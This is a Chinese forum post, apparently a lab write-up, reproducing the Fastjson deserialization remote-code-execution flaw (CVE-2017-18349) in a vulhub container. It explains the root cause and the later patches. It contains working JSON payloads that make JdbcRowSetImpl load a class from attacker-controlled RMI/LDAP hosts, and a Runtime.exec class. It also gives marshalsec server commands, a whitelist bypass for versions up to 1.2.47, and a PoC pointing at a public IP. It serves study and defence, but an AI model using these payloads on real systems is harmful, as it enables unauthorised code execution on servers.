ToB企服应用市场:ToB评测及商务社交产业平台

标题: Fastjson反序列化漏洞 [打印本页]
作者: 农妇山泉一亩田    时间: 2024-5-19 09:19
标题: Fastjson反序列化漏洞
目次

Fastjson 是阿里巴巴开源的一个Java库,用于将Java对象转换为JSON字符串(序列化),以及将JSON字符串转换为Java对象(反序列化),漏洞编号CVE-2017-18349。
漏洞原理

Fastjson 引入了 autoType 功能,允许在反序列化过程中通过 @type 指定一个类的全限定名,Fastjson将会尝试创建该类的实例。
如果服务端反序列化了不可信的JSON数据,攻击者可以构造特定的JSON字符串,使得Fastjson在反序列化时实例化攻击者指定的类,并大概调用该类中的方法,导致远程代码执行。
举个例子:
假设想要利用Fastjson反序列化漏洞来执行远程代码
  1. {
  2.   "@type": "com.sun.rowset.JdbcRowSetImpl",
  3.   "dataSourceName": "rmi://attacker-ip/Exploit",
  4.   "autoCommit": true
  5. }
复制代码
这里的 @type 是告诉Fastjson反序列化时创建 com.sun.rowset.JdbcRowSetImpl 类的实例。
dataSourceName 这是 JdbcRowSetImpl 类的一个属性,可以设置它的值为一个RMI服务器的URL。当Fastjson反序列化这个JSON时,会尝试根据这个URL去指定的RMI服务器中去调用方法。
当Fastjson设置 autoCommit 这个值为 true 时,会触发一个连接操作,进而导致 JdbcRowSetImpl 尝试从RMI服务器加载类。
复现

Fastjson 1.2.24

影响版本:Fastjson < 1.2.25
环境搭建:利用 vulhub 搭建
  1. cd /vulhub/fastjson/1.2.24-rce
  2. docker compose up -d
复制代码
访问 8090 端口,POST一个json对象,可以更新服务端的json的输出:

首先需要的在本地编译一个class文件,目标是让靶机通过RMI服务远程加载这个类,执行此中的代码。
  1. // javac TouchFile.java
  2. import java.lang.Runtime;
  3. import java.lang.Process;
  5. public class TouchFile {
  6.     static {
  7.         try {
  8.             Runtime rt = Runtime.getRuntime();
  9.             String[] commands = {"touch", "/tmp/success-fasrjson"};
  10.             Process pc = rt.exec(commands);
  11.             pc.waitFor();
  12.         } catch (Exception e) {
  13.             // do nothing
  14.         }
  15.     }
  16. }
复制代码
class文件编译好以后,在class文件所在目次启用一个 python http 服务,让靶机可以访问到这个文件。
  1. python3 -m http.server 1234 # 监听在1234端口
复制代码

还需要利用 marshalsec 这个项目来启动一个RMI服务。
  1. git clone https://github.com/mbechler/marshalsec
  2. cd marshalsec
  3. apt-get install maven
  4. mvn clean package -DskipTests # 使用jdk8来构建这个项目
复制代码
如果maven构建速率太慢,可以在 /usr/share/maven/conf/settings.xml 换源。

启动一个RMI服务器,监听 1099 端口(RMI服务默认在1099端口),并指定加载远程类文件:
  1. java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://192.168.88.128:1234/#TouchFile" 1099
复制代码
向靶机POST如下Paylaod,使靶机创建一个JdbcRowSetImpl对象,并调用TouchFile类。

靶机回连本地RMI服务,RMI服务端收到请求:

python服务端收到请求,返回了TouchFile类:

进入到靶机docker环境中,可以看到 /tmp/success-fastjson 文件已经成功创建,利用成功。

除了基于RMI的利用方式,还有基于 LDAP 的利用方式。和RMI的利用方式类似。
还是用 marshalsec, 启动一个LDAP的服务:
  1. java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://192.168.88.128:1234/#TouchFile" 1099
复制代码
POST JSON Paylaod:
  1. {
  2.     "b":{
  3.         "@type":"com.sun.rowset.JdbcRowSetImpl",
  4.         "dataSourceName":"ldap://192.168.88.128:1099/TouchFile",
  5.         "autoCommit":true
  6.     }
  7. }
复制代码
Fastjson 1.2.47

Fastjson在 1.2.24 版本后增加了反序列化白名单,在 1.2.48 以前的版本中,可以利用特殊构造的json字符串绕过白名单检测,成功执行恣意下令。
JSON Payload:
  1. {
  2.     "a":{
  3.         "@type":"java.lang.Class",
  4.         "val":"com.sun.rowset.JdbcRowSetImpl"
  5.     },
  6.     "b":{
  7.         "@type":"com.sun.rowset.JdbcRowSetImpl",
  8.         "dataSourceName":"rmi://attacker-ip/Exploit",
  9.         "autoCommit":true
  10.     }
  11. }
复制代码
漏洞分析

我的Java基础没那么好,这里就联合其他师傅写的文章浅浅地分析一下。
Fastjson漏洞的几个关键函数:
DefaultJSONParser.parseObject() 解析传入的 json 字符串提取差别的 key 进行后续的处理。
TypeUtils.loadClass() 根据传入的类名,天生类的实例。
JavaBeanDeserializer.Deserialze() 依次调用 @type 中传入类的对象公有 set\get\is 方法。
ParserConfig.checkAutoType() 阿里后续添加的防护函数,用于在 loadclass 前检查传入的类是否合法。
首先来看看 1.2.24 版本,274行此处判定如果含有@type标记,则调用lexer.scanSymbol,返回的ref就是@type的值,然后直接利用TypeUtils.loadClass()来天生类的实例clazz。同时1.2.24版本的autoType是默认开启的,autotype功能允许在JSON字符串中通过@type指定一个类的全限定名,然后在反序列化时创建这个类对象,从而就引发了这个反序列化漏洞。

接着来看看 1.2.25 版本是如何修复的,自从1.2.25起autotype默认为False,同时增加了 checkAutoType 方法,不再是直接加载类,在该方法中进行黑名单校验,同时增加白名单机制。

但是这个防御的措施并不完美,原生的 AutoType 相关检查会被被绕过。
1.2.25-1.2.47 版本补丁绕过
漏洞原理是通过java.lang.Class,将JdbcRowSetImpl类加载到Map中缓存,从而绕过AutoType的检测。
这里有两个版本段:
POC
  1. import com.alibaba.fastjson.JSON;
  3. public class Demo {
  4.     public static void main(String[] args) {
  5.         String PoC = "{\n" +
  6.                 "    "a":{\n" +
  7.                 "        "@type":"java.lang.Class",\n" +
  8.                 "        "val":"com.sun.rowset.JdbcRowSetImpl"\n" +
  9.                 "    },\n" +
  10.                 "    "b":{\n" +
  11.                 "        "@type":"com.sun.rowset.JdbcRowSetImpl",\n" +
  12.                 "        "dataSourceName":"ldap://82.156.158.68:1389/EvilClass",\n" +
  13.                 "        "autoCommit":true\n" +                "    }\n" +
  14.                 "}";
  15.         JSON.parse(PoC);
  16.     }
  17. }
复制代码
参考文章
https://vulhub.org/#/environments/fastjson/1.2.24-rce/
https://github.com/luckyfuture0177/VULOnceMore/blob/main/Java框架/CVE-2017-18349Fastjson反序列化.md
https://www.clementi.top/2023/09/24/Fastjson反序列化漏洞复现/index.html
https://www.freebuf.com/vuls/208339.html
https://cert.360.cn/warning/detail?id=7240aeab581c6dc2c9c5350756079955
若有错误,接待指正!o( ̄▽ ̄)ブ

免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。



欢迎光临 ToB企服应用市场:ToB评测及商务社交产业平台 (https://dis.qidao123.com/) Powered by Discuz! X3.4